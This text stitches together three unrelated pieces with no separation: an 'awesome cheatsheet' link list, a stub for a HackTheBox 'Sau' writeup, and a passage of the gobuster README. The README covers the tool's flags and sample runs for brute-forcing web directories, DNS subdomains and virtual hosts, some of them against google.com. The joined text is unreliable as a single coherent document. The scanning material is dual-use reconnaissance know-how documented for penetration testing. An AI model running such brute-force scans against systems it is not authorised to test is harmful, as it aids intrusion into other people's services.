![image-20220519182738441](./images/202205191827578.png)
<img src="https://cdn.rawgit.com/detailyang/awesome-cheatsheet/master/awesome.svg" alt="awesome" width="120" align="right" > # Awesome Cheatsheet [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) ![Branch master](https://img.shields.io/badge/branch-master-brightgreen.svg?style=flat-square) [![Build Status](https://api.travis-ci.org/detailyang/awesome-cheatsheet.svg)](https://travis-ci.org/detailyang/awesome-cheatsheet) [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/detailyang/awesome-cheatsheet/master/LICENSE) > List of useful cheatsheets Inspired by [@sindresorhus](https://github.com/sindresorhus) [awesome](https://github.com/sindresorhus/awesome) and improved by these **[amazing contributors](https://github.com/detailyang/awesome-cheatsheet/graphs/contributors)**. #### *If you see a link here is not fit, you can fix it or provide a better link by submitting a [PR](https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fdetailyang%2Fawesome-cheatsheet%2Fedit%2Fmaster%2FREADME.md) to improve this file. Thank you!* ## Table of Contents - [Platforms](#platforms) - [Programming Languages](#programming-languages) - [Software Testing](#Software-Testing) - [Front-End Development](#front-end-development) - [Back-End Development](#back-end-development) - [Big Data](#big-data) - [Theory](#theory) - [Editors](#editors) - [Tools](#tools) - [Databases](#databases) - [Media](#media) - [Security](#security) - [Project Management](#project-management) - [Miscellaneous](#miscellaneous) ## Platforms - [Android-Cheatsheet-For-Graphic-Designers](http://petrnohejl.github.io/Android-Cheatsheet-For-Graphic-Designers/) - [Arduino_Cheat_Sheet.pdf](https://static.sparkfun.com/learn/materials/8/Arduino_Cheat_Sheet.pdf) - [docker](https://github.com/wsargent/docker-cheat-sheet) - [dockerfiles](https://github.com/jessfraz/dockerfiles) - [ios-cheat-sheet](https://github.com/Avocarrot/ios-cheatsheet) - [iOS-App-Performance-Cheatsheet](https://github.com/danielamitay/iOS-App-Performance-Cheatsheet) - [UI-Testing-Cheat-Sheet](https://github.com/joemasilotti/UI-Testing-Cheat-Sheet) - [saltstack](https://github.com/saltstack/salt/wiki/Cheat-Sheet) - [nginx-cheatsheet](https://github.com/SimulatedGREG/nginx-cheatsheet) ## Programming Languages - [Ada-cheat-sheet](https://web.archive.org/web/20110706133825/http://www.digilife.be/quickreferences/QRC/Ada%20Syntax%20Card.pdf) - [assembly-cheat-sheet](http://www.jegerlehner.ch/intel/) - [coffeescript_cheatsheet](https://github.com/icebob/coffeescript_cheatsheet/) - [c-ansi-cheat-sheet](https://web.archive.org/web/20110706133825/http://www.digilife.be/quickreferences/qrc/c%20reference%20card%20(ansi)%202.2.pdf) - [c#-cheat-sheet ](https://www.slideshare.net/ileshR/core-c-sharpandnetquickreference) - [cpp-cheat-sheet](https://isocpp.org/blog/2012/12/c11-a-cheat-sheet-alex-sinyakov) - [clojure-cheat-sheet](https://clojure.org/cheatsheet) - [clojurescript-cheat-sheet](http://cljs.info/cheatsheet/) - [dart-cheat-sheet](http://dartlang.fr/dart-cheat-sheet/) - [delphi-cheat-sheet](http://www.cheat-sheets.org/saved-copy/dquick.pdf) - [dotnet-cheat-sheet](https://dzone.com/refcardz/coredotnet) - [elixir-cheat-sheet](https://media.pragprog.com/titles/elixir/ElixirCheat.pdf) - [elm-cheat-sheet](https://github.com/izdi/elm-cheat-sheet) - [erlang-cheat-sheet](http://www.cheat-sheets.org/saved-copy/Erlang.CheatSheet(1.0).pdf) - [emoji-cheat-sheet](https://github.com/WebpageFX/emoji-cheat-sheet.com) - [f#-cheat-sheet](http://dungpa.github.io/fsharp-cheatsheet) - [flow-cheat-sheet](https://devhints.io/flow) - [golang-cheat-sheet](https://github.com/a8m/go-lang-cheat-sheet) - [Cheat sheet for some of the common concurrent flows in Go](https://github.com/rakyll/coop) - [Go crash course cheatsheet - Devhints](https://devhints.io/go) - [java-cheat-sheet](http://introcs.cs.princeton.edu/java/11cheatsheet/) - [java8-cheat-sheet](https://github.com/BafS/Java8-CheatSheet) - [javascript-cheat-sheet](http://www.cheatography.com/davechild/cheat-sheets/javascript/) - [es6-cheatsheet](https://github.com/DrkSephy/es6-cheatsheet) - [javascript-design-pattern](https://github.com/nnupoor/js_designpatterns) - [npm-vs-yarn-cheat-sheet](https://shift.infinite.red/npm-vs-yarn-cheat-sheet-8755b092e5cc#.91l58dovs) - [npm-vs-yarn-cheat-sheet](https://github.com/areai51/yarn-cheatsheet) - [lisp-cheat-sheet](http://faculty.smcm.edu/acjamieson/s13/LispCheatSheet.pdf) - [lua-cheat-sheet](http://lua-users.org/files/wiki_insecure/users/thomasl/luarefv51single.pdf) - [objective-c-cheat-sheet](https://github.com/iwasrobbed/Objective-C-CheatSheet) - [ocaml-cheat-sheet](http://ocaml.org/docs/cheat_sheets.html) - [python-cheat-sheet](http://www.cheatography.com/davechild/cheat-sheets/python/) - [Python Cheat Sheet](https://perso.limsi.fr/pointal/_media/python:cours:mementopython3-english.pdf) - [Python Cheat Sheet](https://docs.google.com/file/d/0B9VT_L2CDnKvODYyNTc5NjktYmMyOC00NDFkLTliNTctMzQzMTAzYjUyYmYy/view?pli=1) - [Python Crash Course - Cheat Sheets](http://ehmatthes.github.io/pcc/cheatsheets/README.html) - [python feature](https://github.com/PythonCharmers/python-future) - [Python Basics For Data Science Cheat Sheet](https://www.datacamp.com/community/tutorials/python-data-science-cheat-sheet-basics) - [php-cheat-sheet](http://www.cheatography.com/davechild/cheat-sheets/php/) - [PHP7-Reference](https://github.com/tpunt/PHP7-Reference) - [perlcheat](http://perldoc.perl.org/perlcheat.html) - [r-cheat-sheet](http://cran.r-project.org/doc/contrib/Baggott-refcard-v2.pdf) - [R Cheat Sheets](https://www.rstudio.com/resources/cheatsheets/) - [racket-cheat-sheet](http://docs.racket-lang.org/guide/) - [ragel-cheat-sheet](https://github.com/calio/ragel-cheat-sheet) - [rebol-cheat-sheet](http://rebol.desajn.net/cheatsheet.html) - [ruby-cheat-sheet](https://github.com/brennovich/cheat-ruby-sheets) - [A collection of Ruby Net::HTTP examples](https://github.com/augustl/net-http-cheat-sheet) - [rust-cheat-sheet](https://static.rust-lang.org/doc/0.9/complement-cheatsheet.html) - [Rust Language Cheat Sheet](https://cheats.rs/) - [scala-cheat-sheet](http://docs.scala-lang.org/cheatsheets/) - [scheme-cheat-sheet](http://courses.cs.washington.edu/courses/cse341/02wi/scheme/cheat-sheet.html) - [shell-cheat-sheet](https://github.com/NisreenFarhoud/Bash-Cheatsheet) - [bash cheat sheet](https://learncodethehardway.org/unix/) - [awesome-bash](https://github.com/awesome-lists/awesome-bash) - [bash redirections](https://github.com/pkrumins/bash-redirections-cheat-sheet) - [fish](https://fishshell.com/docs/current/commands.html) - [awesome-shell](https://github.com/alebcay/awesome-shell) - [oh-my-zsh cheatsheet](https://github.com/robbyrussell/oh-my-zsh/wiki/Cheatsheet) - [Shell scripting cheatsheet - Devhints](https://devhints.io/bash) - [solidity](https://github.com/manojpramesh/solidity-cheatsheet/) - [smalltalk-cheat-sheet](http://stephane.ducasse.free.fr/Teaching/0809Turino/st-cheatsheet.pdf) - [swift cheatsheet](https://github.com/iwasrobbed/Swift-CheatSheet) - [Playgrounds](https://github.com/uraimo/Awesome-Swift-Playgrounds) - [swift design patterns](https://github.com/ochococo/Design-Patterns-In-Swift) - [tcl-cheat-sheet](http://wiki.tcl.tk/10710) - [typescript-cheat-sheet](http://www.typescriptlang.org/Handbook/) ## Software Testing - [software testing and verification](https://github.com/ligurio/free-software-testing-books/blob/master/cheatsheets.md) ## Front-End Development - [angular2](https://angular.io/guide/cheatsheet) - [angularjs](http://www.cheatography.com/proloser/cheat-sheets/angularjs/) - [SCSS cheatsheet](https://sass-cheatsheet.brunoscopelliti.com) - [CSS Flex Box](https://jonitrythall.com/images/flexboxsheet.pdf) - [sass/SCSS functions cheatsheet](https://gist.github.com/AllThingsSmitty/3bcc79da563df756be46) - [ember-js](http://www.cheatography.com/mwore/cheat-sheets/ember-js/) - [es6-cheatsheet](https://github.com/DrkSephy/es6-cheatsheet) - [font-awesome](http://fontawesome.io/cheatsheet/) - [jquery](https://oscarotero.com/jquery/) - [jquery-cheatsheet](http://lab.abhinayrathore.com/jquery-cheatsheet/) - [react-cheatsheet](https://reactcheatsheet.com/) - [react-native-cheat-sheet](https://github.com/refinery29/react-native-cheat-sheet) - [react-native-styling-cheat-sheet](https://github.com/vhpoet/react-native-styling-cheat-sheet) - [redux](https://devhints.io/redux) - [underscore-cheat-sheet](http://f.cl.ly/items/093o0l2Y3u130y0W0c0x/underscore-cheat-sheet.pdf) - [webpack](https://github.com/petehunt/webpack-howto) - [\<head> Cheat Sheet](http://gethead.info/) - [page-load Cheat Sheet](https://developers.google.com/speed/docs/insights/about) - [Bootstrap 4](https://hackerthemes.com/bootstrap-cheatsheet/) - [Bootstrap 5 Cheatsheet](https://bootstrap-cheatsheet.themeselection.com/) - [jest-cheat-sheet](https://github.com/sapegin/jest-cheat-sheet) - [flexbox-cheatsheet](http://vudav.github.io/flexbox-cheatsheet/) - [vue-cheatsheet](https://vuejs-tips.github.io/cheatsheet/) ## Back-End Development - [laravel-cheatsheet](https://github.com/jesseobrien/laravel-cheatsheet) - [ror](http://www.cheatography.com/davechild/cheat-sheets/ruby-on-rails/) - [web2py](http://web2py.com/examples/static/web2py_cheatsheet.pdf) - [nodejs](https://gist.github.com/LeCoupa/985b82968d8285987dc3) - [django-cheatsheet](https://www.mercurytide.co.uk/media/resources/django-cheat-sheet.pdf) - [syscall-cheatsheet](http://syscalls.kernelgrok.com/) - [express-cheatsheet](https://quickref.me/express.html) ## Big Data - [machine-learning-cheat-sheet](https://github.com/soulmachine/machine-learning-cheat-sheet) - [data-structure](https://www.scaler.com/topics/data-structures) ## Databases - [CouchDB Cheatsheet](https://wiki.apache.org/couchdb/API_Cheatsheet) - [Db2 CheatSheet for development](https://github.com/angoca/db2-cheat-sheet/blob/master/Db2CheatSheetForDev.pdf) - [Elasticsearch](http://elasticsearch-cheatsheet.jolicode.com) - [MongoDb-cheat-sheet](https://github.com/leojavier/MongoDb-cheat-sheet) - [mysql-cheat-sheet](http://www.cheatography.com/davechild/cheat-sheets/mysql/) - [Oracle_Programming](https://en.wikibooks.org/wiki/Oracle_Programming/SQL_Cheatsheet) - [postgresql](https://dzone.com/refcardz/essential-postgresql) - [sql-join-cheat-sheet](http://coolshell.cn/articles/3463.html) - [SQL](http://www.sql-tutorial.net/sql-cheat-sheet.pdf) ## Theory - [acm-cheat-sheet](https://github.com/soulmachine/acm-cheat-sheet) - [bigo](http://bigocheatsheet.com/) - [Theoretical Computer Science Cheat Sheet](http://www.tug.org/texshowcase/cheat.pdf) - [regular-expression-cheat-sheet](https://github.com/niklongstone/regular-expression-cheat-sheet) - [rest-foundations-restful](https://dzone.com/refcardz/rest-foundations-restful) - [Computer-Networks-Last-Minute-Notes](https://www.geeksforgeeks.org/last-minute-notes-computer-network/) - [Operating-System-Notes](https://www.geeksforgeeks.org/last-minute-notes-operating-systems/) ## Editors - [a_vi_vim_graphical_cheat_sheet_tutorial](http://www.viemu.com/a_vi_vim_graphical_cheat_sheet_tutorial.html) - [Vim Quick Reference Card](https://michaelgoerz.net/refcards/vimqrc.pdf) - [A really easy to read and comprehensive guide on vim.](https://vim.rtorr.com/) - [GNU Emacs](https://www.gnu.org/software/emacs/refcards/pdf/refcard.pdf) - [Paredit Cheatsheet](https://www.emacswiki.org/emacs/PareditCheatsheet) - IntellJ IDEA - [Windows/Linux](https://resources.jetbrains.com/storage/products/intellij-idea/docs/IntelliJIDEA_ReferenceCard.pdf) - [Mac OS X](https://resources.jetbrains.com/storage/products/intellij-idea/docs/IntelliJIDEA_ReferenceCard.pdf) - [MarkDown Cheat Sheet](https://guides.github.com/pdfs/markdown-cheatsheet-online.pdf) - [Eclipse](https://github.com/pellaton/eclipse-cheatsheet) - [Atom](https://github.com/nwinkler/atom-keyboard-shortcuts) - [NetBeans](https://netbeans.org/project_downloads/usersguide/shortcuts-80.pdf) - [Sublime Text 3](https://www.shortcutfoo.com/app/dojos/sublime-text-3-win/cheatsheet) - [PHPStorm - Mac/Win](https://resources.jetbrains.com/storage/products/phpstorm/docs/PhpStorm_ReferenceCard.pdf) - [Notepad++](https://drive.google.com/file/d/1r4rPmYQ-dMz_9UNUKKH9F6KyWDLSlwke) - [VsCode](https://code.visualstudio.com/shortcuts/keyboard-shortcuts-windows.pdf) ## Tools - [awk-nawk-and-gawk-cheat-sheet](http://www.catonmat.net/blog/awk-nawk-and-gawk-cheat-sheet/) - [curl](https://github.com/bagder/curl-cheat-sheet) - [dtrace and stap](http://myaut.github.io/dtrace-stap-book/dtrace-stap-cheatsheet.pdf) - [GDAL/OGR command-line tools](https://github.com/dwtkns/gdal-cheat-sheet) - [Git Cheat Sheet and Git Flow](https://github.com/arslanbilal/git-cheat-sheet) - [git_cheat_sheet](http://rogerdudler.github.io/git-guide/files/git_cheat_sheet.pdf) - [git-cheat-sheet](https://github.com/arslanbilal/git-cheat-sheet) - [github-cheat-sheet](https://github.com/tiimgreen/github-cheat-sheet) - [git-style-guide](https://github.com/agis/git-style-guide) - [git-flow-cheatsheet](https://github.com/danielkummer/git-flow-cheatsheet) - [interactive git cheat sheet](https://the-awesome-git-cheat-sheet.com/) - [Kafka](https://github.com/Landoop/kafka-cheat-sheet) - [latexsheet](http://wch.github.io/latexsheet/) - [mac-command-line-cheatsheet](https://github.com/herrbischoff/awesome-osx-command-line) - [matlab-cheatsheet](http://web.mit.edu/18.06/www/Spring09/matlab-cheatsheet.pdf) - [Mobaxterm](https://drive.google.com/file/d/0B86nuTd5nMTKRWxrdE44cEZodHc/view) - [Octave-cheatsheet](http://ais.informatik.uni-freiburg.de/teaching/ss14/robotics/etc/cheatsheet.pdf) - [rspec](https://gist.github.com/dnagir/663876) - [RSpec cheatsheet](https://github.com/eliotsykes/rspec-rails-examples) - [svn](http://www.abbeyworkshop.com/howto/misc/svn01/) - [sed-stream-editor-cheat-sheet](http://www.catonmat.net/blog/sed-stream-editor-cheat-sheet/) - [terminal-mac-cheatsheet](https://github.com/0nn0/terminal-mac-cheatsheet) - [tmux](https://gist.github.com/andreyvit/2921703) - [Unix Toolbox](http://cb.vu/unixtoolbox.xhtml) - [sysadmin](https://github.com/kahun/awesome-sysadmin) - [systemtap-cheat-sheet](https://github.com/calio/systemtap-cheat-sheet) - [Zypper Command Line Tool Cheatsheat](https://en.opensuse.org/images/1/17/Zypper-cheat-sheet-1.pdf) ## Media - [favicon-cheat-sheet](https://github.com/audreyr/favicon-cheat-sheet) ## Security - [HTML5 Security Cheatsheet](https://github.com/cure53/H5SC) - [Security Tools Cheatsheets](https://github.com/andrewjkerr/security-cheatsheets) - [oauthsecurity](https://sakurity.com/oauth) - [OWASP Cheat Sheets](https://www.owasp.org/images/9/9a/OWASP_Cheatsheets_Book.pdf) ## Project Management - [Agile Cheatsheet](http://cheatsheetworld.com/programming/agile-development-cheat-sheet/) - [Scrum Cheatsheet](https://www.axosoft.com/Downloads/Scrum_Diagram.pdf) - [Kanban Cheatsheet](https://teamhood.com/wp-content/uploads/2022/11/Kanban-Cheat-Sheet.png) - [Lean Cheatsheet](https://www.cheatography.com/davidpol/cheat-sheets/lean-methodology/pdf_bw/) - [A set of metodologies in one Cheatsheet (waterfall, agile, lean, xp, etc)](https://www.cheatography.com/nataliemoore/cheat-sheets/system-development-methodologies/pdf_bw/) ## Miscellaneous - [easings.net](https://github.com/ai/easings.net) - [math-as-code](https://github.com/Jam3/math-as-code) - [MobileApp-Pentest-Cheatsheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet) - [Network-related cheatsheets](http://packetlife.net/library/cheat-sheets/) - [api-cheat-sheet](https://github.com/RestCheatSheet/api-cheat-sheet) - [cheatsheets-ai](https://github.com/kailashahirwar/cheatsheets-ai) - [Systems Programming Cheat Sheet](https://github.com/jstrieb/systems-programming-cheat-sheet) - [Video Streaming Cheatsheet](https://github.com/robert-will-brown/video-streaming-cheatsheet)
# Sau - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Sau is still an active machine, A [Full writeup](Sau-Writeup.pdf) is available, Access to the writeup requires the root hash as the password. Telegram: [@evyatar9](https://t.me/evyatar9) Discord: [evyatar9#5800](https://discordapp.com/users/812805349815091251) ![pwn.JPG](images/pwn.JPG)
# Gobuster Gobuster is a tool used to brute-force: - URIs (directories and files) in web sites. - DNS subdomains (with wildcard support). - Virtual Host names on target web servers. - Open Amazon S3 buckets - Open Google Cloud buckets - TFTP servers ## Tags, Statuses, etc [![Build Status](https://travis-ci.com/OJ/gobuster.svg?branch=master)](https://travis-ci.com/OJ/gobuster) [![Backers on Open Collective](https://opencollective.com/gobuster/backers/badge.svg)](https://opencollective.com/gobuster) [![Sponsors on Open Collective](https://opencollective.com/gobuster/sponsors/badge.svg)](https://opencollective.com/gobuster) ## Love this tool? Back it! If you're backing us already, you rock. If you're not, that's cool too! Want to back us? [Become a backer](https://opencollective.com/gobuster#backer)! [![Backers](https://opencollective.com/gobuster/backers.svg?width=890)](https://opencollective.com/gobuster#backers) All funds that are donated to this project will be donated to charity. A full log of charity donations will be available in this repository as they are processed. # Changes ## 3.6 - Wordlist offset parameter to skip x lines from the wordlist - prevent double slashes when building up an url in dir mode - allow for multiple values and ranges on `--exclude-length` - `no-fqdn` parameter on dns bruteforce to disable the use of the systems search domains. This should speed up the run if you have configured some search domains. [https://github.com/OJ/gobuster/pull/418](https://github.com/OJ/gobuster/pull/418) ## 3.5 - Allow Ranges in status code and status code blacklist. Example: 200,300-305,404 ## 3.4 - Enable TLS1.0 and TLS1.1 support - Add TFTP mode to search for files on tftp servers ## 3.3 - Support TLS client certificates / mtls - support loading extensions from file - support fuzzing POST body, HTTP headers and basic auth - new option to not canonicalize header names ## 3.2 - Use go 1.19 - use contexts in the correct way - get rid of the wildcard flag (except in DNS mode) - color output - retry on timeout - google cloud bucket enumeration - fix nil reference errors ## 3.1 - enumerate public AWS S3 buckets - fuzzing mode - specify HTTP method - added support for patterns. You can now specify a file containing patterns that are applied to every word, one by line. Every occurrence of the term `{GOBUSTER}` in it will be replaced with the current wordlist item. Please use with caution as this can cause increase the number of requests issued a lot. - The shorthand `p` flag which was assigned to proxy is now used by the pattern flag ## 3.0 - New CLI options so modes are strictly separated (`-m` is now gone!) - Performance Optimizations and better connection handling - Ability to enumerate vhost names - Option to supply custom HTTP headers # License See the LICENSE file. # Manual ## Available Modes - dir - the classic directory brute-forcing mode - dns - DNS subdomain brute-forcing mode - s3 - Enumerate open S3 buckets and look for existence and bucket listings - gcs - Enumerate open google cloud buckets - vhost - virtual host brute-forcing mode (not the same as DNS!) - fuzz - some basic fuzzing, replaces the `FUZZ` keyword - tftp - bruteforce tftp files ## Easy Installation ### Binary Releases We are now shipping binaries for each of the releases so that you don't even have to build them yourself! How wonderful is that! If you're stupid enough to trust binaries that I've put together, you can download them from the [releases](https://github.com/OJ/gobuster/releases) page. ### Docker You can also grab a prebuilt docker image from [https://github.com/OJ/gobuster/pkgs/container/gobuster](https://github.com/OJ/gobuster/pkgs/container/gobuster) ```bash docker pull ghcr.io/oj/gobuster:latest ``` ### Using `go install` If you have a [Go](https://golang.org/) environment ready to go (at least go 1.19), it's as easy as: ```bash go install github.com/OJ/gobuster/v3@latest ``` PS: You need at least go 1.19 to compile gobuster. ### Building From Source Since this tool is written in [Go](https://golang.org/) you need to install the Go language/compiler/etc. Full details of installation and set up can be found [on the Go language website](https://golang.org/doc/install). Once installed you have two options. You need at least go 1.19 to compile gobuster. ### Compiling `gobuster` has external dependencies, and so they need to be pulled in first: ```bash go get && go build ``` This will create a `gobuster` binary for you. If you want to install it in the `$GOPATH/bin` folder you can run: ```bash go install ``` ## Modes Help is built-in! - `gobuster help` - outputs the top-level help. - `gobuster help <mode>` - outputs the help specific to that mode. ## `dns` Mode ### Options ```text Uses DNS subdomain enumeration mode Usage: gobuster dns [flags] Flags: -d, --domain string The target domain -h, --help help for dns -r, --resolver string Use custom DNS server (format server.com or server.com:port) -c, --show-cname Show CNAME records (cannot be used with '-i' option) -i, --show-ips Show IP addresses --timeout duration DNS resolver timeout (default 1s) --wildcard Force continued operation when wildcard found Global Flags: --delay duration Time each thread waits between requests (e.g. 1500ms) --no-color Disable color output --no-error Don't display errors -z, --no-progress Don't display progress -o, --output string Output file to write results to (defaults to stdout) -p, --pattern string File containing replacement patterns -q, --quiet Don't print the banner and other noise -t, --threads int Number of concurrent threads (default 10) -v, --verbose Verbose output (errors) -w, --wordlist string Path to the wordlist ``` ### Examples ```text gobuster dns -d mysite.com -t 50 -w common-names.txt ``` Normal sample run goes like this: ```text gobuster dns -d google.com -w ~/wordlists/subdomains.txt =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dns [+] Url/Domain : google.com [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/subdomains.txt =============================================================== 2019/06/21 11:54:20 Starting gobuster =============================================================== Found: chrome.google.com Found: ns1.google.com Found: admin.google.com Found: www.google.com Found: m.google.com Found: support.google.com Found: translate.google.com Found: cse.google.com Found: news.google.com Found: music.google.com Found: mail.google.com Found: store.google.com Found: mobile.google.com Found: search.google.com Found: wap.google.com Found: directory.google.com Found: local.google.com Found: blog.google.com =============================================================== 2019/06/21 11:54:20 Finished =============================================================== ``` Show IP sample run goes like this: ```text gobuster dns -d google.com -w ~/wordlists/subdomains.txt -i =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dns [+] Url/Domain : google.com [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/subdomains.txt =============================================================== 2019/06/21 11:54:54 Starting gobuster =============================================================== Found: www.google.com [172.217.25.36, 2404:6800:4006:802::2004] Found: admin.google.com [172.217.25.46, 2404:6800:4006:806::200e] Found: store.google.com [172.217.167.78, 2404:6800:4006:802::200e] Found: mobile.google.com [172.217.25.43, 2404:6800:4006:802::200b] Found: ns1.google.com [216.239.32.10, 2001:4860:4802:32::a] Found: m.google.com [172.217.25.43, 2404:6800:4006:802::200b] Found: cse.google.com [172.217.25.46, 2404:6800:4006:80a::200e] Found: chrome.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: search.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: local.google.com [172.217.25.46, 2404:6800:4006:80a::200e] Found: news.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: blog.google.com [216.58.199.73, 2404:6800:4006:806::2009] Found: support.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: wap.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: directory.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: translate.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: music.google.com [172.217.25.46, 2404:6800:4006:802::200e] Found: mail.google.com [172.217.25.37, 2404:6800:4006:802::2005] =============================================================== 2019/06/21 11:54:55 Finished =============================================================== ``` Base domain validation warning when the base domain fails to resolve. This is a warning rather than a failure in case the user fat-fingers while typing the domain. ```text gobuster dns -d yp.to -w ~/wordlists/subdomains.txt -i =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dns [+] Url/Domain : yp.to [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/subdomains.txt =============================================================== 2019/06/21 11:56:43 Starting gobuster =============================================================== 2019/06/21 11:56:53 [-] Unable to validate base domain: yp.to Found: cr.yp.to [131.193.32.108, 131.193.32.109] =============================================================== 2019/06/21 11:56:53 Finished =============================================================== ``` Wildcard DNS is also detected properly: ```text gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dns [+] Url/Domain : 0.0.1.xip.io [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/subdomains.txt =============================================================== 2019/06/21 12:13:48 Starting gobuster =============================================================== 2019/06/21 12:13:48 [-] Wildcard DNS found. IP address(es): 1.0.0.0 2019/06/21 12:13:48 [!] To force processing of Wildcard DNS, specify the '--wildcard' switch. =============================================================== 2019/06/21 12:13:48 Finished =============================================================== ``` If the user wants to force processing of a domain that has wildcard entries, use `--wildcard`: ```text gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt --wildcard =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dns [+] Url/Domain : 0.0.1.xip.io [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/subdomains.txt =============================================================== 2019/06/21 12:13:51 Starting gobuster =============================================================== 2019/06/21 12:13:51 [-] Wildcard DNS found. IP address(es): 1.0.0.0 Found: 127.0.0.1.xip.io Found: test.127.0.0.1.xip.io =============================================================== 2019/06/21 12:13:53 Finished =============================================================== ``` ## `dir` Mode ### Options ```text Uses directory/file enumeration mode Usage: gobuster dir [flags] Flags: -f, --add-slash Append / to each request -c, --cookies string Cookies to use for the requests -d, --discover-backup Also search for backup files by appending multiple backup extensions --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. -e, --expanded Expanded mode, print full URLs -x, --extensions string File extension(s) to search for -r, --follow-redirect Follow redirects -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -h, --help help for dir --hide-length Hide the length of the body in the output -m, --method string Use the following HTTP method (default "GET") -n, --no-status Don't print status codes -k, --no-tls-validation Skip TLS certificate verification -P, --password string Password for Basic Auth --proxy string Proxy to use for requests [http(s)://host:port] --random-agent Use a random User-Agent string --retry Should retry on request timeout --retry-attempts int Times to retry on request timeout (default 3) -s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) -b, --status-codes-blacklist string Negative status codes (will override status-codes if set) (default "404") --timeout duration HTTP Timeout (default 10s) -u, --url string The target URL -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") -U, --username string Username for Basic Auth Global Flags: --delay duration Time each thread waits between requests (e.g. 1500ms) --no-color Disable color output --no-error Don't display errors -z, --no-progress Don't display progress -o, --output string Output file to write results to (defaults to stdout) -p, --pattern string File containing replacement patterns -q, --quiet Don't print the banner and other noise -t, --threads int Number of concurrent threads (default 10) -v, --verbose Verbose output (errors) -w, --wordlist string Path to the wordlist ``` ### Examples ```text gobuster dir -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html ``` Default options looks like this: ```text gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dir [+] Url/Domain : https://buffered.io/ [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/shortlist.txt [+] Status codes : 200,204,301,302,307,401,403 [+] User Agent : gobuster/3.2.0 [+] Timeout : 10s =============================================================== 2019/06/21 11:49:43 Starting gobuster =============================================================== /categories (Status: 301) /contact (Status: 301) /posts (Status: 301) /index (Status: 200) =============================================================== 2019/06/21 11:49:44 Finished =============================================================== ``` Default options with status codes disabled looks like this: ```text gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -n =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dir [+] Url/Domain : https://buffered.io/ [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/shortlist.txt [+] Status codes : 200,204,301,302,307,401,403 [+] User Agent : gobuster/3.2.0 [+] No status : true [+] Timeout : 10s =============================================================== 2019/06/21 11:50:18 Starting gobuster =============================================================== /categories /contact /index /posts =============================================================== 2019/06/21 11:50:18 Finished =============================================================== ``` Verbose output looks like this: ```text gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -v =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dir [+] Url/Domain : https://buffered.io/ [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/shortlist.txt [+] Status codes : 200,204,301,302,307,401,403 [+] User Agent : gobuster/3.2.0 [+] Verbose : true [+] Timeout : 10s =============================================================== 2019/06/21 11:50:51 Starting gobuster =============================================================== Missed: /alsodoesnotexist (Status: 404) Found: /index (Status: 200) Missed: /doesnotexist (Status: 404) Found: /categories (Status: 301) Found: /posts (Status: 301) Found: /contact (Status: 301) =============================================================== 2019/06/21 11:50:51 Finished =============================================================== ``` Example showing content length: ```text gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -l =============================================================== Gobuster v3.2.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Mode : dir [+] Url/Domain : https://buffered.io/ [+] Threads : 10 [+] Wordlist : /home/oj/wordlists/shortlist.txt [+] Status codes : 200,204,301,302,307,401,403 [+] User Agent : gobuster/3.2.0 [+] Show length : true [+] Timeout : 10s =============================================================== 2019/06/21 11:51:16 Starting gobuster =============================================================== /categories (Status: 301) [Size: 178] /posts (Status: 301) [Size: 178] /contact (Status: 301) [Size: 178] /index (Status: 200) [Size: 51759] =============================================================== 2019/06/21 11:51:17 Finished =============================================================== ``` Quiet output, with status disabled and expanded mode looks like this ("grep mode"): ```text gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -q -n -e https://buffered.io/index https://buffered.io/contact https://buffered.io/posts https://buffered.io/categories ``` ## `vhost` Mode ### Options ```text Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter) Usage: gobuster vhost 